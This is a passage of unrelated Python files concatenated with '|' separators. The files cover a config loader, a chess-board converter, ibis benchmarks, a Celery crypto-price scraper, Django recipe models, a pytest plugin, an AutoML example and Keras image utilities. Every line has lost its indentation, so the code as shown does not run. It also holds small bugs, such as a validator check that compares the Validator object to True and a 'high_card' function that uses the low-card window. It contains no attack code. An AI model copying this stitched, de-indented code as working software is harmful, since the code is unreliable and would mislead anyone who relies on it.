"""
Update config from file
:param file_path: config file path
:param format: format of config file (default: json)
"""
with open(file_path, 'r') as f:
self.load_from_string(f.read(), format)
def load_from_string(self, data: str, format: 'str' = None) -> None:
"""
Update config from string and validate
:param data: target data
:param format: format of config file (default: json)
"""
if format:
self._import_parser(format)
return self.load(self._parser.loads(data))
def load(self, data: dict) -> None:
"""
Update config from param `data`
:param data: data
"""
if self._validator_schema:
self.validate(data)
self._data.update(data)
def validate(self, data: str) -> None:
"""
Validate data
:param data: config data
"""
try:
cerberus = import_module('cerberus')
except ImportError:
raise Exception('CatConfig need `cerberus` module to make validation work normally, '
'please add `cerberus` module to your project.')
v = cerberus.Validator(self._validator_schema)
v.validate(data)
if v != True:
raise ValidationError(v.errors)
def update(self, data: dict) -> None:
"""
Update config item
:param data: data to be updated
"""
self._data.update(data)
def set(self, key: str, value: str) -> None:
"""
Set config value
:param key: key of config item
:param value: value of config item
"""
return self.update({key: value})
def get(self, key: str=None) -> Any:
"""
Get item by key
It will return self contained object if param `key` == None
:param key: key
"""
if key == None:
return self._data
if key in self._data:
data = self._data.get(key)
if isinstance(data, dict):
return CatConfig(data=data)
elif isinstance(data, list):
return [CatConfig(data=x) for x in data]
else:
return data
return CatConfig()
def __getitem__(self, key: str) -> Any:
return self.get(key)
def __bool__(self):
"""
Return False if `self._data` has no item
"""
return len(self._data) != 0
def __getattr__(self, name: str) -> Any:
return self.__getitem__(name)
def __eq__(self, b):
"""
Make sure CatConfig object without any data equal False
"""
if b == None:
if len(self._data.keys()) == 0:
return True
return self._data == b
def __str__(self):
if self._data == {}:
return 'None'
return str(self._data)
|
from engine.utils import RF_sq64, sq64_to_sq120, print_board
def react_chess_board_to_IZII_board(board):
if board is None:
exit()
izii_board = ["x"] * 120
pieces = board.split(',')
for i in range(len(izii_board)):
if i >= 20 and i < 100:
if i % 10 != 0 and i % 10 != 9:
izii_board[i] = 'o'
for p in pieces:
# print("pp", p)
piece_with_RF = p.split('@')
# print("look: ", piece_with_RF)
piece = piece_with_RF[0]
RF = piece_with_RF[1]
sq64 = RF_sq64(RF[0], RF[1])
sq120 = sq64_to_sq120(sq64)
izii_board[sq120] = piece
return ''.join(izii_board)
|
import numpy as np
import pandas as pd
import pytest
import ibis
import ibis.expr.datatypes as dt
from ibis.backends.pandas.udf import udf
def make_t():
return ibis.table(
[
('_timestamp', 'int32'),
('dim1', 'int32'),
('dim2', 'int32'),
('valid_seconds', 'int32'),
('meas1', 'int32'),
('meas2', 'int32'),
('year', 'int32'),
('month', 'int32'),
('day', 'int32'),
('hour', 'int32'),
('minute', 'int32'),
],
name="t",
)
@pytest.fixture
def t():
return make_t()
def make_base(t):
return (
(t.year > 2016)
| ((t.year == 2016) & (t.month > 6))
| ((t.year == 2016) & (t.month == 6) & (t.day > 6))
| ((t.year == 2016) & (t.month == 6) & (t.day == 6) & (t.hour > 6))
| (
(t.year == 2016)
& (t.month == 6)
& (t.day == 6)
& (t.hour == 6)
& (t.minute >= 5)
)
) & (
(t.year < 2016)
| ((t.year == 2016) & (t.month < 6))
| ((t.year == 2016) & (t.month == 6) & (t.day < 6))
| ((t.year == 2016) & (t.month == 6) & (t.day == 6) & (t.hour < 6))
| (
(t.year == 2016)
& (t.month == 6)
& (t.day == 6)
& (t.hour == 6)
& (t.minute <= 5)
)
)
@pytest.fixture
def base(t):
return make_base(t)
def make_large_expr(t, base):
src_table = t[base]
src_table = src_table.mutate(
_timestamp=(src_table['_timestamp'] - src_table['_timestamp'] % 3600)
.cast('int32')
.name('_timestamp'),
valid_seconds=300,
)
aggs = []
for meas in ['meas1', 'meas2']:
aggs.append(src_table[meas].sum().cast('float').name(meas))
src_table = src_table.aggregate(
aggs, by=['_timestamp', 'dim1', 'dim2', 'valid_seconds']
)
part_keys = ['year', 'month', 'day', 'hour', 'minute']
ts_col = src_table['_timestamp'].cast('timestamp')
new_cols = {}
for part_key in part_keys:
part_col = getattr(ts_col, part_key)()
new_cols[part_key] = part_col
src_table = src_table.mutate(**new_cols)
return src_table[
[
'_timestamp',
'dim1',
'dim2',
'meas1',
'meas2',
'year',
'month',
'day',
'hour',
'minute',
]
]
@pytest.fixture
def large_expr(t, base):
return make_large_expr(t, base)
@pytest.mark.benchmark(group="construction")
@pytest.mark.parametrize(
"construction_fn",
[
pytest.param(lambda *_: make_t(), id="small"),
pytest.param(lambda t, *_: make_base(t), id="medium"),
pytest.param(lambda t, base: make_large_expr(t, base), id="large"),
],
)
def test_construction(benchmark, construction_fn, t, base):
benchmark(construction_fn, t, base)
@pytest.mark.benchmark(group="builtins")
@pytest.mark.parametrize(
"expr_fn",
[
pytest.param(lambda t, _base, _large_expr: t, id="small"),
pytest.param(lambda _t, base, _large_expr: base, id="medium"),
pytest.param(lambda _t, _base, large_expr: large_expr, id="large"),
],
)
@pytest.mark.parametrize("builtin", [hash, str])
def test_builtins(benchmark, expr_fn, builtin, t, base, large_expr):
expr = expr_fn(t, base, large_expr)
benchmark(builtin, expr)
@pytest.mark.benchmark(group="compilation")
@pytest.mark.parametrize("module", ["impala", "sqlite"])
@pytest.mark.parametrize(
"expr_fn",
[
pytest.param(lambda t, _base, _large_expr: t, id="small"),
pytest.param(lambda _t, base, _large_expr: base, id="medium"),
pytest.param(lambda _t, _base, large_expr: large_expr, id="large"),
],
)
def test_compile(benchmark, module, expr_fn, t, base, large_expr):
try:
mod = getattr(ibis, module)
except AttributeError as e:
pytest.skip(str(e))
else:
expr = expr_fn(t, base, large_expr)
benchmark(mod.compile, expr)
@pytest.fixture
def pt():
n = 60_000
data = pd.DataFrame(
{
'key': np.random.choice(16000, size=n),
'low_card_key': np.random.choice(30, size=n),
'value': np.random.rand(n),
'timestamps': pd.date_range(
start='now', periods=n, freq='s'
).values,
'timestamp_strings': pd.date_range(
start='now', periods=n, freq='s'
).values.astype(str),
'repeated_timestamps': pd.date_range(
start='2018-09-01', periods=30
).repeat(int(n / 30)),
}
)
return ibis.pandas.connect(dict(df=data)).table('df')
def high_card_group_by(t):
return t.groupby(t.key).aggregate(avg_value=t.value.mean())
def cast_to_dates(t):
return t.timestamps.cast(dt.date)
def cast_to_dates_from_strings(t):
return t.timestamp_strings.cast(dt.date)
def multikey_group_by_with_mutate(t):
return (
t.mutate(dates=t.timestamps.cast('date'))
.groupby(['low_card_key', 'dates'])
.aggregate(avg_value=lambda t: t.value.mean())
)
def simple_sort(t):
return t.sort_by([t.key])
def simple_sort_projection(t):
return t[['key', 'value']].sort_by(['key'])
def multikey_sort(t):
return t.sort_by(['low_card_key', 'key'])
def multikey_sort_projection(t):
return t[['low_card_key', 'key', 'value']].sort_by(['low_card_key', 'key'])
def low_card_rolling_window(t):
return ibis.trailing_range_window(
ibis.interval(days=2),
order_by=t.repeated_timestamps,
group_by=t.low_card_key,
)
def low_card_grouped_rolling(t):
return t.value.mean().over(low_card_rolling_window(t))
def high_card_rolling_window(t):
return ibis.trailing_range_window(
ibis.interval(days=2),
order_by=t.repeated_timestamps,
group_by=t.key,
)
def high_card_grouped_rolling(t):
return t.value.mean().over(high_card_rolling_window(t))
@udf.reduction(['double'], 'double')
def my_mean(series):
return series.mean()
def low_card_grouped_rolling_udf_mean(t):
return my_mean(t.value).over(low_card_rolling_window(t))
def high_card_grouped_rolling_udf_mean(t):
return my_mean(t.value).over(high_card_rolling_window(t))
@udf.analytic(['double'], 'double')
def my_zscore(series):
return (series - series.mean()) / series.std()
def low_card_window(t):
return ibis.window(group_by=t.low_card_key)
def high_card_window(t):
return ibis.window(group_by=t.key)
def low_card_window_analytics_udf(t):
return my_zscore(t.value).over(low_card_window(t))
def high_card_window_analytics_udf(t):
return my_zscore(t.value).over(high_card_window(t))
@udf.reduction(['double', 'double'], 'double')
def my_wm(v, w):
return np.average(v, weights=w)
def low_card_grouped_rolling_udf_wm(t):
return my_wm(t.value, t.value).over(low_card_rolling_window(t))
def high_card_grouped_rolling_udf_wm(t):
return my_wm(t.value, t.value).over(low_card_rolling_window(t))
@pytest.mark.benchmark(group="execution")
@pytest.mark.parametrize(
"expression_fn",
[
pytest.param(high_card_group_by, id="high_card_group_by"),
pytest.param(cast_to_dates, id="cast_to_dates"),
pytest.param(
cast_to_dates_from_strings, id="cast_to_dates_from_strings"
),
pytest.param(
multikey_group_by_with_mutate, id="multikey_group_by_with_mutate"
),
pytest.param(simple_sort, id="simple_sort"),
pytest.param(simple_sort_projection, id="simple_sort_projection"),
pytest.param(multikey_sort, id="multikey_sort"),
pytest.param(multikey_sort_projection, id="multikey_sort_projection"),
pytest.param(low_card_grouped_rolling, id="low_card_grouped_rolling"),
pytest.param(
high_card_grouped_rolling, id="high_card_grouped_rolling"
),
pytest.param(
low_card_grouped_rolling_udf_mean,
id="low_card_grouped_rolling_udf_mean",
),
pytest.param(
high_card_grouped_rolling_udf_mean,
id="high_card_grouped_rolling_udf_mean",
),
pytest.param(
low_card_window_analytics_udf, id="low_card_window_analytics_udf"
),
pytest.param(
high_card_window_analytics_udf, id="high_card_window_analytics_udf"
),
pytest.param(
low_card_grouped_rolling_udf_wm,
id="low_card_grouped_rolling_udf_wm",
),
pytest.param(
high_card_grouped_rolling_udf_wm,
id="high_card_grouped_rolling_udf_wm",
),
],
)
def test_execute(benchmark, expression_fn, pt):
expr = expression_fn(pt)
benchmark(expr.execute)
|
import time
from threading import Thread
def timestamp_datetime(value):
format = '%Y-%m-%d %H:%M:%S'
value = time.localtime(value)
dt = time.strftime(format, value)
return dt
def log(s):
print("[",timestamp_datetime(time.time()),"]",s)
|
from time import sleep
from urllib.request import urlopen, Request
from bs4 import BeautifulSoup
from celery.schedules import crontab
from celery.task import periodic_task
from crypto.models import Cryptocurrency
# @shared_task
@periodic_task(
run_every=(crontab(minute="*/15")),
name="create_cryptocurrency",
# ignore_result=True
)
def create_cryptocurrency():
print("Crawling data and creating objects in database ..")
req = Request("https://coinranking.com", headers={"User-Agent": "Mozilla/5.0"})
html = urlopen(req).read()
bs = BeautifulSoup(html, "html.parser")
# Find first 5 table rows
rows = bs.find("tbody", class_="table__body").find_all("tr", class_="table__row")[
0:5
]
for row in rows:
cryptocurrency = (
row.find("span", class_="profile__name")
.get_text()
.strip()
.replace("\n", "")
)
values = row.find_all("div", class_="valuta")
price = values[0].get_text().strip().replace("\n", "")
market_cap = values[1].get_text().strip().replace("\n", "")
change = (
row.find("div", class_="change")
.find("span")
.get_text()
.strip()
.replace("\n", "")
)
print(
{
"cryptocurrency": cryptocurrency,
"price": price,
"market_cap": market_cap,
"change": change,
}
)
# Create object in database from crawled data
Cryptocurrency.objects.create(
cryptocurrency=cryptocurrency,
price=price,
market_cap=market_cap,
change=change,
)
# Sleep 3 seconds to avoid any errors
sleep(3)
# @shared_task
@periodic_task(
run_every=(crontab(minute="*/15")),
name="update_cryptocurrency",
)
def update_cryptocurrency():
print("Updating data ..")
req = Request("https://coinranking.com", headers={"User-Agent": "Mozilla/5.0"})
html = urlopen(req).read()
bs = BeautifulSoup(html, "html.parser")
rows = bs.find("tbody", class_="table__body").find_all("tr", class_="table__row")[
0:5
]
for row in rows:
cryptocurrency = (
row.find("span", class_="profile__name")
.get_text()
.strip()
.replace("\n", "")
)
values = row.find_all("div", class_="valuta")
price = values[0].get_text().strip().replace("\n", "")
market_cap = values[1].get_text().strip().replace("\n", "")
change = (
row.find("div", class_="change")
.find("span")
.get_text()
.strip()
.replace("\n", "")
)
print(
{
"cryptocurrency": cryptocurrency,
"price": price,
"market_cap": market_cap,
"change": change,
}
)
data = {
"cryptocurrency": cryptocurrency,
"price": price,
"market_cap": market_cap,
"change": change,
}
Cryptocurrency.objects.filter(cryptocurrency=cryptocurrency).update(**data)
sleep(3)
|
# generated by datamodel-codegen:
# filename: schema/entity/data/database.json
# timestamp: 2021-09-27T15:46:37+00:00
from __future__ import annotations
from typing import Optional
from pydantic import BaseModel, Field, constr
from ...type import basic, entityReference, usageDetails
class DatabaseName(BaseModel):
__root__: constr(regex=r'^[^.]*$', min_length=1, max_length=64) = Field(
..., description='Name that identifies the database.'
)
class Database(BaseModel):
id: Optional[basic.Uuid] = Field(
None, description='Unique identifier that identifies this database instance.'
)
name: DatabaseName = Field(..., description='Name that identifies the database.')
fullyQualifiedName: Optional[str] = Field(
None,
description="Name that uniquely identifies a database in the format 'ServiceName.DatabaseName'.",
)
description: Optional[str] = Field(
None, description='Description of the database instance.'
)
href: Optional[basic.Href] = Field(
None, description='Link to the resource corresponding to this entity.'
)
owner: Optional[entityReference.EntityReference] = Field(
None, description='Owner of this database.'
)
service: entityReference.EntityReference = Field(
...,
description='Link to the database cluster/service where this database is hosted in.',
)
usageSummary: Optional[usageDetails.TypeUsedToReturnUsageDetailsOfAnEntity] = Field(
None, description='Latest usage information for this database.'
)
tables: Optional[entityReference.EntityReferenceList] = Field(
None, description='References to tables in the database.'
)
|
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and Saves a New User"""
if not email:
raise ValueError('Users must have a Valid Email Address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and Saves a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom User Model that supports using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=True)
objects = UserManager()
USERNAME_FIELD = 'email'
class Tag(models.Model):
"""Tag to be used for a recipe """
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Ingredient(models.Model):
"""Ingredient to be used for a recipe """
name = models.CharField(max_length=255)
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
def __str__(self):
return self.name
class Recipe(models.Model):
"""Recipe Object"""
user = models.ForeignKey(
settings.AUTH_USER_MODEL,
on_delete=models.CASCADE,
)
title = models.CharField(max_length=255)
time_minutes = models.IntegerField()
price = models.DecimalField(max_digits=5, decimal_places=2)
link = models.CharField(max_length=255, blank=True)
ingredients = models.ManyToManyField('Ingredient')
tags = models.ManyToManyField('Tag')
def __str__(self):
return self.title
|
import re
import pickle
import tempfile
import pytest
from _pytest.config import Config
from _pytest._io.terminalwriter import TerminalWriter
from _pytest.reports import TestReport
from pytest_fold.tui_pytermtk import main as tuitk
from pytest_fold.tui_textual1 import main as tuitxt1
from pytest_fold.tui_textual2 import main as tuitxt2
from pytest_fold.utils import (
test_session_starts_matcher,
errors_section_matcher,
failures_section_matcher,
warnings_summary_matcher,
passes_section_matcher,
short_test_summary_matcher,
lastline_matcher,
MARKERS,
REPORTFILE,
MARKEDTERMINALOUTPUTFILE,
UNMARKEDTERMINALOUTPUTFILE,
)
# Don't collect tests from any of these files
collect_ignore = [
"setup.py",
"plugin.py",
]
# A list of TestReport objects generated by Pytest during test run.
# Each TestReport represents a single test's operation during one of
# Pytest's three phases: setup | call | teardown
reports = []
def pytest_addoption(parser):
"""Define the plugin's option flags as presented by Pytest"""
group = parser.getgroup("fold")
group.addoption(
"--fold",
action="store_true",
help="fold failed test output sections",
)
group.addoption(
"--fold-tui",
"--ft",
action="store",
default="pytermtk",
help="specify user interface ('pytermtk' ' k' | 'textual1' 't1' | 'textual2' 't2' | 'none' 'n')",
choices=["pytermtk", "k", "textual1", "t1", "textual2", "t2", "none", "n"],
)
def pytest_report_teststatus(report: TestReport, config: Config):
"""Construct list(s) of individial TestReport instances"""
reports.append(report)
@pytest.hookimpl(trylast=True)
def pytest_configure(config: Config) -> None:
"""
Write console output to a file for use by TUI
This code works by looking at every line sent by Pytest to the terminal,
and based on its category, marking or not marking it
"""
config.option.verbose = (
1 # force verbose mode for easier parsing of final test results
)
config.option.reportchars = (
"A" # force "display all" mode so all results can be shown
)
if config.option.fold:
tr = config.pluginmanager.getplugin("terminalreporter")
if tr is not None:
# identify and mark the very first line of terminal output
try:
config._pyfoldfirsttime
except AttributeError:
config._pyfoldfirsttime = True
config._pyfold_unmarked_outputfile = tempfile.TemporaryFile("wb+")
config._pyfold_marked_outputfile = tempfile.TemporaryFile("wb+")
oldwrite = tr._tw.write
# identify and mark each results section
def tee_write(s, **kwargs):
if re.search(test_session_starts_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_test_session_starts"] + "\n").encode(
"utf-8"
)
)
if re.search(errors_section_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_errors_section"] + "\n").encode("utf-8")
)
if re.search(failures_section_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_failures_section"] + "\n").encode("utf-8")
)
if re.search(warnings_summary_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_warnings_summary"] + "\n").encode("utf-8")
)
if re.search(passes_section_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_passes_section"] + "\n").encode("utf-8")
)
if re.search(short_test_summary_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_short_test_summary"] + "\n").encode(
"utf-8"
)
)
if re.search(lastline_matcher, s):
config._pyfold_marked_outputfile.write(
(MARKERS["pytest_fold_last_line"] + "\n").encode("utf-8")
)
# Write this line's text along with its markup info to console
oldwrite(s, **kwargs)
# Mark up this line's text by passing it to an instance of TerminalWriter's
# 'markup' method. Do not pass "flush" to the method or it will throw an error.
s1 = s
kwargs.pop("flush") if "flush" in kwargs.keys() else None
s1 = TerminalWriter().markup(s, **kwargs)
# Encode the marked up line so it can be written to the config object.
# The Pytest config object can be used by plugins for conveying staeful
# info across an entire test run session.
if isinstance(s1, str):
marked_up = s1.encode("utf-8")
config._pyfold_marked_outputfile.write(marked_up)
# Write this line's original (unmarked) text to unmarked file
s_orig = s
kwargs.pop("flush") if "flush" in kwargs.keys() else None
s_orig = TerminalWriter().markup(s, **kwargs)
if isinstance(s_orig, str):
unmarked_up = s_orig.encode("utf-8")
config._pyfold_unmarked_outputfile.write(unmarked_up)
# Write to both terminal/console and tempfiles:
# _pyfold_marked_outputfile, _pyfold_unmarked_outputfile
tr._tw.write = tee_write
def pytest_unconfigure(config: Config):
"""
Write terminal and test results info to files for use by TUI
"""
# Write terminal output to file
if hasattr(config, "_pyfold_marked_outputfile"):
# get terminal contents, then write file
config._pyfold_marked_outputfile.seek(0)
markedsessionlog = config._pyfold_marked_outputfile.read()
config._pyfold_marked_outputfile.close()
if hasattr(config, "_pyfold_unmarked_outputfile"):
# get terminal contents, then write file
config._pyfold_unmarked_outputfile.seek(0)
unmarkedsessionlog = config._pyfold_unmarked_outputfile.read()
config._pyfold_unmarked_outputfile.close()
# Undo our patching in the terminal reporter
config.pluginmanager.getplugin("terminalreporter")
# Write marked-up results to file
with open(MARKEDTERMINALOUTPUTFILE, "wb") as marked_file:
marked_file.write(markedsessionlog)
# Write un-marked-up results to file
with open(UNMARKEDTERMINALOUTPUTFILE, "wb") as unmarked_file:
unmarked_file.write(unmarkedsessionlog)
# Write the reports list to file
with open(REPORTFILE, "wb") as report_file:
pickle.dump(reports, report_file)
# Launch the TUI
if config.getoption("--fold") == True:
pyfold_tui(config)
def pyfold_tui(config: Config) -> None:
"""
Final code invocation after Pytest run has completed.
This method calls the Pyfold TUI to display final results.
"""
# disable capturing while TUI runs to avoid error `redirected stdin is pseudofile, has
# no fileno()`; adapted from https://githubmemory.com/repo/jsbueno/terminedia/issues/25
if not config.getoption("--fold"):
return
capmanager = config.pluginmanager.getplugin("capturemanager")
try:
capmanager.suspend_global_capture(in_=True)
finally:
if config.getoption("--ft") in ["k", "pytermtk"]:
tuitk()
elif config.getoption("--ft") in ["t1", "textual1"]:
tuitxt1()
elif config.getoption("--ft") in ["t2", "textual2"]:
tuitxt2()
elif config.getoption("--ft") not in ["n", "none"]:
print(f"Incorrect choice for fold-tui: {config.getoption('--ft')}")
capmanager.resume_global_capture()
|
import argparse
import os
import sys
import time
import numpy as np
from ConfigSpace.configuration_space import ConfigurationSpace
from ConfigSpace.hyperparameters import UniformFloatHyperparameter, \
UniformIntegerHyperparameter, CategoricalHyperparameter, \
UnParametrizedHyperparameter, Constant
from sklearn.datasets import load_iris
from sklearn.metrics import balanced_accuracy_score
from sklearn.model_selection import train_test_split
sys.path.append(os.getcwd())
from mindware.utils.data_manager import DataManager
from mindware.estimators import Classifier
from mindware.components.models.base_model import BaseClassificationModel
from mindware.components.models.classification import add_classifier
from mindware.components.utils.configspace_utils import check_none
from mindware.components.utils.constants import DENSE, SPARSE, UNSIGNED_DATA, PREDICTIONS
parser = argparse.ArgumentParser()
parser.add_argument('--time_limit', type=int, default=1200)
args = parser.parse_args()
time_limit = args.time_limit
class UserDefinedDecisionTree(BaseClassificationModel):
def __init__(self, criterion, max_features, max_depth_factor,
min_samples_split, min_samples_leaf, min_weight_fraction_leaf,
max_leaf_nodes, min_impurity_decrease, class_weight=None,
random_state=None):
self.criterion = criterion
self.max_features = max_features
self.max_depth_factor = max_depth_factor
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.max_leaf_nodes = max_leaf_nodes
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.min_impurity_decrease = min_impurity_decrease
self.random_state = random_state
self.class_weight = class_weight
self.estimator = None
self.time_limit = None
def fit(self, X, y, sample_weight=None):
from sklearn.tree import DecisionTreeClassifier
self.max_features = float(self.max_features)
# Heuristic to set the tree depth
if check_none(self.max_depth_factor):
max_depth_factor = self.max_depth_factor = None
else:
num_features = X.shape[1]
self.max_depth_factor = int(self.max_depth_factor)
max_depth_factor = max(
1,
int(np.round(self.max_depth_factor * num_features, 0)))
self.min_samples_split = int(self.min_samples_split)
self.min_samples_leaf = int(self.min_samples_leaf)
if check_none(self.max_leaf_nodes):
self.max_leaf_nodes = None
else:
self.max_leaf_nodes = int(self.max_leaf_nodes)
self.min_weight_fraction_leaf = float(self.min_weight_fraction_leaf)
self.min_impurity_decrease = float(self.min_impurity_decrease)
self.estimator = DecisionTreeClassifier(
criterion=self.criterion,
max_depth=max_depth_factor,
min_samples_split=self.min_samples_split,
min_samples_leaf=self.min_samples_leaf,
max_leaf_nodes=self.max_leaf_nodes,
min_weight_fraction_leaf=self.min_weight_fraction_leaf,
min_impurity_decrease=self.min_impurity_decrease,
class_weight=self.class_weight,
random_state=self.random_state)
self.estimator.fit(X, y, sample_weight=sample_weight)
return self
def predict(self, X):
if self.estimator is None:
raise NotImplementedError
return self.estimator.predict(X)
def predict_proba(self, X):
if self.estimator is None:
raise NotImplementedError()
probas = self.estimator.predict_proba(X)
return probas
@staticmethod
def get_properties(dataset_properties=None):
return {'shortname': 'DT',
'name': 'Decision Tree Classifier',
'handles_regression': False,
'handles_classification': True,
'handles_multiclass': True,
'handles_multilabel': True,
'is_deterministic': True,
'input': (DENSE, SPARSE, UNSIGNED_DATA),
'output': (PREDICTIONS,)}
@staticmethod
def get_hyperparameter_search_space(dataset_properties=None, optimizer='smac'):
if optimizer == 'smac':
cs = ConfigurationSpace()
criterion = CategoricalHyperparameter(
"criterion", ["gini", "entropy"], default_value="gini")
max_depth_factor = UniformFloatHyperparameter(
'max_depth_factor', 0., 2., default_value=0.5)
min_samples_split = UniformIntegerHyperparameter(
"min_samples_split", 2, 20, default_value=2)
min_samples_leaf = UniformIntegerHyperparameter(
"min_samples_leaf", 1, 20, default_value=1)
min_weight_fraction_leaf = Constant("min_weight_fraction_leaf", 0.0)
max_features = UnParametrizedHyperparameter('max_features', 1.0)
max_leaf_nodes = UnParametrizedHyperparameter("max_leaf_nodes", "None")
min_impurity_decrease = UnParametrizedHyperparameter('min_impurity_decrease', 0.0)
cs.add_hyperparameters([criterion, max_features, max_depth_factor,
min_samples_split, min_samples_leaf,
min_weight_fraction_leaf, max_leaf_nodes,
min_impurity_decrease])
return cs
print('==> Start to evaluate with Budget %d' % time_limit)
iris = load_iris()
X, y = iris.data, iris.target
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.33, random_state=1)
dm = DataManager(X_train, y_train)
train_data = dm.get_data_node(X_train, y_train)
test_data = dm.get_data_node(X_test, y_test)
save_dir = './data/eval_exps/soln-ml'
if not os.path.exists(save_dir):
os.makedirs(save_dir)
add_classifier(UserDefinedDecisionTree)
clf = Classifier(time_limit=time_limit,
output_dir=save_dir,
include_algorithms=['UserDefinedDecisionTree'],
random_state=1,
metric='acc',
n_jobs=1)
_start_time = time.time()
_iter_id = 0
clf.fit(train_data)
pred = clf.predict(test_data)
print(balanced_accuracy_score(test_data.data[1], pred))
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
# pylint: disable=g-import-not-at-top
# pylint: disable=g-classes-have-attributes
# pylint: disable=g-direct-tensorflow-import
"""Utilies for image preprocessing and augmentation.
Warning: `tf.keras.preprocessing.image` APIs do not operate on tensors and are
not recommended for new code. Prefer loading data with
`tf.keras.utils.image_dataset_from_directory`, and then transforming the output
`tf.data.Dataset` with preprocessing layers. For more information, see the
tutorials for [loading images](
https://www.tensorflow.org/tutorials/load_data/images) and [augmenting images](
https://www.tensorflow.org/tutorials/images/data_augmentation), as well as the
[preprocessing layer guide](
https://www.tensorflow.org/guide/keras/preprocessing_layers).
"""
import collections
import io
import multiprocessing
import os
import pathlib
import threading
import warnings
from keras import backend
from keras.utils import data_utils
import numpy as np
from tensorflow.python.util.tf_export import keras_export
try:
import scipy
from scipy import linalg # pylint: disable=unused-import
from scipy import ndimage # pylint: disable=unused-import
except ImportError:
pass
try:
from PIL import Image as pil_image
from PIL import ImageEnhance
except ImportError:
pil_image = None
ImageEnhance = None
if pil_image is not None:
_PIL_INTERPOLATION_METHODS = {
'nearest': pil_image.NEAREST,
'bilinear': pil_image.BILINEAR,
'bicubic': pil_image.BICUBIC,
'hamming': pil_image.HAMMING,
'box': pil_image.BOX,
'lanczos': pil_image.LANCZOS,
}
@keras_export('keras.utils.array_to_img',
'keras.preprocessing.image.array_to_img')
def array_to_img(x, data_format=None, scale=True, dtype=None):
"""Converts a 3D Numpy array to a PIL Image instance.
Usage:
```python
from PIL import Image
img = np.random.random(size=(100, 100, 3))
pil_img = tf.keras.preprocessing.image.array_to_img(img)
```
Args:
x: Input data, in any form that can be converted to a Numpy array.
data_format: Image data format, can be either "channels_first" or
"channels_last". Defaults to `None`, in which case the global setting
`tf.keras.backend.image_data_format()` is used (unless you changed it,
it defaults to "channels_last").
scale: Whether to rescale the image such that minimum and maximum values
are 0 and 255 respectively. Defaults to `True`.
dtype: Dtype to use. Default to `None`, in which case the global setting
`tf.keras.backend.floatx()` is used (unless you changed it, it defaults
to "float32")
Returns:
A PIL Image instance.
Raises:
ImportError: if PIL is not available.
ValueError: if invalid `x` or `data_format` is passed.
"""
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
if pil_image is None:
raise ImportError('Could not import PIL.Image. '
'The use of `array_to_img` requires PIL.')
x = np.asarray(x, dtype=dtype)
if x.ndim != 3:
raise ValueError('Expected image array to have rank 3 (single image). '
f'Got array with shape: {x.shape}')
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError(f'Invalid data_format: {data_format}')
# Original Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but target PIL image has format (width, height, channel)
if data_format == 'channels_first':
x = x.transpose(1, 2, 0)
if scale:
x = x - np.min(x)
x_max = np.max(x)
if x_max != 0:
x /= x_max
x *= 255
if x.shape[2] == 4:
# RGBA
return pil_image.fromarray(x.astype('uint8'), 'RGBA')
elif x.shape[2] == 3:
# RGB
return pil_image.fromarray(x.astype('uint8'), 'RGB')
elif x.shape[2] == 1:
# grayscale
if np.max(x) > 255:
# 32-bit signed integer grayscale image. PIL mode "I"
return pil_image.fromarray(x[:, :, 0].astype('int32'), 'I')
return pil_image.fromarray(x[:, :, 0].astype('uint8'), 'L')
else:
raise ValueError(f'Unsupported channel number: {x.shape[2]}')
@keras_export('keras.utils.img_to_array',
'keras.preprocessing.image.img_to_array')
def img_to_array(img, data_format=None, dtype=None):
"""Converts a PIL Image instance to a Numpy array.
Usage:
```python
from PIL import Image
img_data = np.random.random(size=(100, 100, 3))
img = tf.keras.preprocessing.image.array_to_img(img_data)
array = tf.keras.preprocessing.image.img_to_array(img)
```
Args:
img: Input PIL Image instance.
data_format: Image data format, can be either "channels_first" or
"channels_last". Defaults to `None`, in which case the global setting
`tf.keras.backend.image_data_format()` is used (unless you changed it,
it defaults to "channels_last").
dtype: Dtype to use. Default to `None`, in which case the global setting
`tf.keras.backend.floatx()` is used (unless you changed it, it defaults
to "float32")
Returns:
A 3D Numpy array.
Raises:
ValueError: if invalid `img` or `data_format` is passed.
"""
if data_format is None:
data_format = backend.image_data_format()
if dtype is None:
dtype = backend.floatx()
if data_format not in {'channels_first', 'channels_last'}:
raise ValueError(f'Unknown data_format: {data_format}')
# Numpy array x has format (height, width, channel)
# or (channel, height, width)
# but original PIL image has format (width, height, channel)
x = np.asarray(img, dtype=dtype)
if len(x.shape) == 3:
if data_format == 'channels_first':
x = x.transpose(2, 0, 1)
elif len(x.shape) == 2:
